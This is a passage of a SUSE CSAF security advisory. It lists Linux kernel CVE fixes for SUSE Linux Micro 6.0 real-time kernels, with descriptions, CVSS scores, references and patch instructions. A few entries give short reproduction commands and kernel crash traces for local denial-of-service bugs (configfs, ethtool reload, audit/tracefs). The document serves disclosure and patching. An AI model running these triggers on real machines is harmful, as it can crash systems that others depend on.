"text": "In the Linux kernel, the following vulnerability has been resolved:\n\niio: core: Prevent invalid memory access when there is no parent\n\nCommit 813665564b3d (\"iio: core: Convert to use firmware node handle\ninstead of OF node\") switched the kind of nodes to use for label\nretrieval in device registration. Probably an unwanted change in that\ncommit was that if the device has no parent then NULL pointer is\naccessed. This is what happens in the stock IIO dummy driver when a\nnew entry is created in configfs:\n\n # mkdir /sys/kernel/config/iio/devices/dummy/foo\n BUG: kernel NULL pointer dereference, address: ...\n ...\n Call Trace:\n __iio_device_register\n iio_dummy_probe\n\nSince there seems to be no reason to make a parent device of an IIO\ndummy device mandatory, let\u0027s prevent the invalid memory access in\n__iio_device_register when the parent device is NULL. With this\nchange, the IIO dummy driver works fine with configfs.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54027",
"url": "https://www.suse.com/security/cve/CVE-2023-54027"
},
{
"category": "external",
"summary": "SUSE Bug 1255579 for CVE-2023-54027",
"url": "https://bugzilla.suse.com/1255579"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-54027"
},
{
"cve": "CVE-2023-54030",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54030"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nio_uring/net: don\u0027t overflow multishot recv\n\nDon\u0027t allow overflowing multishot recv CQEs, it might get out of\nhand, hurt performance, and in the worst case scenario OOM the task.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54030",
"url": "https://www.suse.com/security/cve/CVE-2023-54030"
},
{
"category": "external",
"summary": "SUSE Bug 1255691 for CVE-2023-54030",
"url": "https://bugzilla.suse.com/1255691"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.3,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "low"
}
],
"title": "CVE-2023-54030"
},
{
"cve": "CVE-2023-54031",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54031"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nvdpa: Add queue index attr to vdpa_nl_policy for nlattr length check\n\nThe vdpa_nl_policy structure is used to validate the nlattr when parsing\nthe incoming nlmsg. It will ensure the attribute being described produces\na valid nlattr pointer in info-\u003eattrs before entering into each handler\nin vdpa_nl_ops.\n\nThat is to say, the missing part in vdpa_nl_policy may lead to illegal\nnlattr after parsing, which could lead to OOB read just like CVE-2023-3773.\n\nThis patch adds the missing nla_policy for vdpa queue index attr to avoid\nsuch bugs.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54031",
"url": "https://www.suse.com/security/cve/CVE-2023-54031"
},
{
"category": "external",
"summary": "SUSE Bug 1255583 for CVE-2023-54031",
"url": "https://bugzilla.suse.com/1255583"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-54031"
},
{
"cve": "CVE-2023-54032",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54032"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbtrfs: fix race when deleting quota root from the dirty cow roots list\n\nWhen disabling quotas we are deleting the quota root from the list\nfs_info-\u003edirty_cowonly_roots without taking the lock that protects it,\nwhich is struct btrfs_fs_info::trans_lock. This unsynchronized list\nmanipulation may cause chaos if there\u0027s another concurrent manipulation\nof this list, such as when adding a root to it with\nctree.c:add_root_to_dirty_list().\n\nThis can result in all sorts of weird failures caused by a race, such as\nthe following crash:\n\n [337571.278245] general protection fault, probably for non-canonical address 0xdead000000000108: 0000 [#1] PREEMPT SMP PTI\n [337571.278933] CPU: 1 PID: 115447 Comm: btrfs Tainted: G W 6.4.0-rc6-btrfs-next-134+ #1\n [337571.279153] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.14.0-0-g155821a1990b-prebuilt.qemu.org 04/01/2014\n [337571.279572] RIP: 0010:commit_cowonly_roots+0x11f/0x250 [btrfs]\n [337571.279928] Code: 85 38 06 00 (...)\n [337571.280363] RSP: 0018:ffff9f63446efba0 EFLAGS: 00010206\n [337571.280582] RAX: ffff942d98ec2638 RBX: ffff9430b82b4c30 RCX: 0000000449e1c000\n [337571.280798] RDX: dead000000000100 RSI: ffff9430021e4900 RDI: 0000000000036070\n [337571.281015] RBP: ffff942d98ec2000 R08: ffff942d98ec2000 R09: 000000000000015b\n [337571.281254] R10: 0000000000000009 R11: 0000000000000001 R12: ffff942fe8fbf600\n [337571.281476] R13: ffff942dabe23040 R14: ffff942dabe20800 R15: ffff942d92cf3b48\n [337571.281723] FS: 00007f478adb7340(0000) GS:ffff94349fa40000(0000) knlGS:0000000000000000\n [337571.281950] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n [337571.282184] CR2: 00007f478ab9a3d5 CR3: 000000001e02c001 CR4: 0000000000370ee0\n [337571.282416] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\n [337571.282647] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400\n [337571.282874] Call Trace:\n [337571.283101] \u003cTASK\u003e\n [337571.283327] ? __die_body+0x1b/0x60\n [337571.283570] ? die_addr+0x39/0x60\n [337571.283796] ? exc_general_protection+0x22e/0x430\n [337571.284022] ? asm_exc_general_protection+0x22/0x30\n [337571.284251] ? commit_cowonly_roots+0x11f/0x250 [btrfs]\n [337571.284531] btrfs_commit_transaction+0x42e/0xf90 [btrfs]\n [337571.284803] ? _raw_spin_unlock+0x15/0x30\n [337571.285031] ? release_extent_buffer+0x103/0x130 [btrfs]\n [337571.285305] reset_balance_state+0x152/0x1b0 [btrfs]\n [337571.285578] btrfs_balance+0xa50/0x11e0 [btrfs]\n [337571.285864] ? __kmem_cache_alloc_node+0x14a/0x410\n [337571.286086] btrfs_ioctl+0x249a/0x3320 [btrfs]\n [337571.286358] ? mod_objcg_state+0xd2/0x360\n [337571.286577] ? refill_obj_stock+0xb0/0x160\n [337571.286798] ? seq_release+0x25/0x30\n [337571.287016] ? __rseq_handle_notify_resume+0x3ba/0x4b0\n [337571.287235] ? percpu_counter_add_batch+0x2e/0xa0\n [337571.287455] ? __x64_sys_ioctl+0x88/0xc0\n [337571.287675] __x64_sys_ioctl+0x88/0xc0\n [337571.287901] do_syscall_64+0x38/0x90\n [337571.288126] entry_SYSCALL_64_after_hwframe+0x72/0xdc\n [337571.288352] RIP: 0033:0x7f478aaffe9b\n\nSo fix this by locking struct btrfs_fs_info::trans_lock before deleting\nthe quota root from that list.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54032",
"url": "https://www.suse.com/security/cve/CVE-2023-54032"
},
{
"category": "external",
"summary": "SUSE Bug 1255617 for CVE-2023-54032",
"url": "https://bugzilla.suse.com/1255617"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-54032"
},
{
"cve": "CVE-2023-54035",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54035"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnetfilter: nf_tables: fix underflow in chain reference counter\n\nSet element addition error path decrements reference counter on chains\ntwice: once on element release and again via nft_data_release().\n\nThen, d6b478666ffa (\"netfilter: nf_tables: fix underflow in object\nreference counter\") incorrectly fixed this by removing the stateful\nobject reference count decrement.\n\nRestore the stateful object decrement as in b91d90368837 (\"netfilter:\nnf_tables: fix leaking object reference count\") and let\nnft_data_release() decrement the chain reference counter, so this is\ndone only once.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54035",
"url": "https://www.suse.com/security/cve/CVE-2023-54035"
},
{
"category": "external",
"summary": "SUSE Bug 1255563 for CVE-2023-54035",
"url": "https://bugzilla.suse.com/1255563"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-54035"
},
{
"cve": "CVE-2023-54037",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54037"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nice: prevent NULL pointer deref during reload\n\nCalling ethtool during reload can lead to call trace, because VSI isn\u0027t\nconfigured for some time, but netdev is alive.\n\nTo fix it add rtnl lock for VSI deconfig and config. Set ::num_q_vectors\nto 0 after freeing and add a check for ::tx/rx_rings in ring related\nethtool ops.\n\nAdd proper unroll of filters in ice_start_eth().\n\nReproduction:\n$watch -n 0.1 -d \u0027ethtool -g enp24s0f0np0\u0027\n$devlink dev reload pci/0000:18:00.0 action driver_reinit\n\nCall trace before fix:\n[66303.926205] BUG: kernel NULL pointer dereference, address: 0000000000000000\n[66303.926259] #PF: supervisor read access in kernel mode\n[66303.926286] #PF: error_code(0x0000) - not-present page\n[66303.926311] PGD 0 P4D 0\n[66303.926332] Oops: 0000 [#1] PREEMPT SMP PTI\n[66303.926358] CPU: 4 PID: 933821 Comm: ethtool Kdump: loaded Tainted: G OE 6.4.0-rc5+ #1\n[66303.926400] Hardware name: Intel Corporation S2600WFT/S2600WFT, BIOS SE5C620.86B.00.01.0014.070920180847 07/09/2018\n[66303.926446] RIP: 0010:ice_get_ringparam+0x22/0x50 [ice]\n[66303.926649] Code: 90 90 90 90 90 90 90 90 f3 0f 1e fa 0f 1f 44 00 00 48 8b 87 c0 09 00 00 c7 46 04 e0 1f 00 00 c7 46 10 e0 1f 00 00 48 8b 50 20 \u003c48\u003e 8b 12 0f b7 52 3a 89 56 14 48 8b 40 28 48 8b 00 0f b7 40 58 48\n[66303.926722] RSP: 0018:ffffad40472f39c8 EFLAGS: 00010246\n[66303.926749] RAX: ffff98a8ada05828 RBX: ffff98a8c46dd060 RCX: ffffad40472f3b48\n[66303.926781] RDX: 0000000000000000 RSI: ffff98a8c46dd068 RDI: ffff98a8b23c4000\n[66303.926811] RBP: ffffad40472f3b48 R08: 00000000000337b0 R09: 0000000000000000\n[66303.926843] R10: 0000000000000001 R11: 0000000000000100 R12: ffff98a8b23c4000\n[66303.926874] R13: ffff98a8c46dd060 R14: 000000000000000f R15: ffffad40472f3a50\n[66303.926906] FS: 00007f6397966740(0000) GS:ffff98b390900000(0000) knlGS:0000000000000000\n[66303.926941] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\n[66303.926967] CR2: 0000000000000000 CR3: 000000011ac20002 CR4: 00000000007706e0\n[66303.926999] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000\n[66303.927029] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400\n[66303.927060] PKRU: 55555554\n[66303.927075] Call Trace:\n[66303.927094] \u003cTASK\u003e\n[66303.927111] ? __die+0x23/0x70\n[66303.927140] ? page_fault_oops+0x171/0x4e0\n[66303.927176] ? exc_page_fault+0x7f/0x180\n[66303.927209] ? asm_exc_page_fault+0x26/0x30\n[66303.927244] ? ice_get_ringparam+0x22/0x50 [ice]\n[66303.927433] rings_prepare_data+0x62/0x80\n[66303.927469] ethnl_default_doit+0xe2/0x350\n[66303.927501] genl_family_rcv_msg_doit.isra.0+0xe3/0x140\n[66303.927538] genl_rcv_msg+0x1b1/0x2c0\n[66303.927561] ? __pfx_ethnl_default_doit+0x10/0x10\n[66303.927590] ? __pfx_genl_rcv_msg+0x10/0x10\n[66303.927615] netlink_rcv_skb+0x58/0x110\n[66303.927644] genl_rcv+0x28/0x40\n[66303.927665] netlink_unicast+0x19e/0x290\n[66303.927691] netlink_sendmsg+0x254/0x4d0\n[66303.927717] sock_sendmsg+0x93/0xa0\n[66303.927743] __sys_sendto+0x126/0x170\n[66303.927780] __x64_sys_sendto+0x24/0x30\n[66303.928593] do_syscall_64+0x5d/0x90\n[66303.929370] ? __count_memcg_events+0x60/0xa0\n[66303.930146] ? count_memcg_events.constprop.0+0x1a/0x30\n[66303.930920] ? handle_mm_fault+0x9e/0x350\n[66303.931688] ? do_user_addr_fault+0x258/0x740\n[66303.932452] ? exc_page_fault+0x7f/0x180\n[66303.933193] entry_SYSCALL_64_after_hwframe+0x72/0xdc",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54037",
"url": "https://www.suse.com/security/cve/CVE-2023-54037"
},
{
"category": "external",
"summary": "SUSE Bug 1255557 for CVE-2023-54037",
"url": "https://bugzilla.suse.com/1255557"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-54037"
},
{
"cve": "CVE-2023-54038",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54038"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nBluetooth: hci_conn: return ERR_PTR instead of NULL when there is no link\n\nhci_connect_sco currently returns NULL when there is no link (i.e. when\nhci_conn_link() returns NULL).\n\nsco_connect() expects an ERR_PTR in case of any error (see line 266 in\nsco.c). Thus, hcon set as NULL passes through to sco_conn_add(), which\ntries to get hcon-\u003ehdev, resulting in dereferencing a NULL pointer as\nreported by syzkaller.\n\nThe same issue exists for iso_connect_cis() calling hci_connect_cis().\n\nThus, make hci_connect_sco() and hci_connect_cis() return ERR_PTR\ninstead of NULL.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54038",
"url": "https://www.suse.com/security/cve/CVE-2023-54038"
},
{
"category": "external",
"summary": "SUSE Bug 1255540 for CVE-2023-54038",
"url": "https://bugzilla.suse.com/1255540"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "moderate"
}
],
"title": "CVE-2023-54038"
},
{
"cve": "CVE-2023-54042",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54042"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\npowerpc/64s: Fix VAS mm use after free\n\nThe refcount on mm is dropped before the coprocessor is detached.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54042",
"url": "https://www.suse.com/security/cve/CVE-2023-54042"
},
{
"category": "external",
"summary": "SUSE Bug 1255702 for CVE-2023-54042",
"url": "https://bugzilla.suse.com/1255702"
},
{
"category": "external",
"summary": "SUSE Bug 1257670 for CVE-2023-54042",
"url": "https://bugzilla.suse.com/1257670"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.8,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-03-24T16:48:38Z",
"details": "important"
}
],
"title": "CVE-2023-54042"
},
{
"cve": "CVE-2023-54045",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2023-54045"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\naudit: fix possible soft lockup in __audit_inode_child()\n\nTracefs or debugfs maybe cause hundreds to thousands of PATH records,\ntoo many PATH records maybe cause soft lockup.\n\nFor example:\n 1. CONFIG_KASAN=y \u0026\u0026 CONFIG_PREEMPTION=n\n 2. auditctl -a exit,always -S open -k key\n 3. sysctl -w kernel.watchdog_thresh=5\n 4. mkdir /sys/kernel/debug/tracing/instances/test\n\nThere may be a soft lockup as follows:\n watchdog: BUG: soft lockup - CPU#45 stuck for 7s! [mkdir:15498]\n Kernel panic - not syncing: softlockup: hung tasks\n Call trace:\n dump_backtrace+0x0/0x30c\n show_stack+0x20/0x30\n dump_stack+0x11c/0x174\n panic+0x27c/0x494\n watchdog_timer_fn+0x2bc/0x390\n __run_hrtimer+0x148/0x4fc\n __hrtimer_run_queues+0x154/0x210\n hrtimer_interrupt+0x2c4/0x760\n arch_timer_handler_phys+0x48/0x60\n handle_percpu_devid_irq+0xe0/0x340\n __handle_domain_irq+0xbc/0x130\n gic_handle_irq+0x78/0x460\n el1_irq+0xb8/0x140\n __audit_inode_child+0x240/0x7bc\n tracefs_create_file+0x1b8/0x2a0\n trace_create_file+0x18/0x50\n event_create_dir+0x204/0x30c\n __trace_add_new_event+0xac/0x100\n event_trace_add_tracer+0xa0/0x130\n trace_array_create_dir+0x60/0x140\n trace_array_create+0x1e0/0x370\n instance_mkdir+0x90/0xd0\n tracefs_syscall_mkdir+0x68/0xa0\n vfs_mkdir+0x21c/0x34c\n do_mkdirat+0x1b4/0x1d4\n __arm64_sys_mkdirat+0x4c/0x60\n el0_svc_common.constprop.0+0xa8/0x240\n do_el0_svc+0x8c/0xc0\n el0_svc+0x20/0x30\n el0_sync_handler+0xb0/0xb4\n el0_sync+0x160/0x180\n\nTherefore, we add cond_resched() to __audit_inode_child() to fix it.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2023-54045",
"url": "https://www.suse.com/security/cve/CVE-2023-54045"
},
{
"category": "external",
"summary": "SUSE Bug 1256285 for CVE-2023-54045",
"url": "https://bugzilla.suse.com/1256285"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-devel-rt-6.4.0-40.1.noarch",
"SUSE Linux Micro 6.0:kernel-rt-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-rt-livepatch-6.4.0-40.1.x86_64",
"SUSE Linux Micro 6.0:kernel-source-rt-6.4.0-40.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
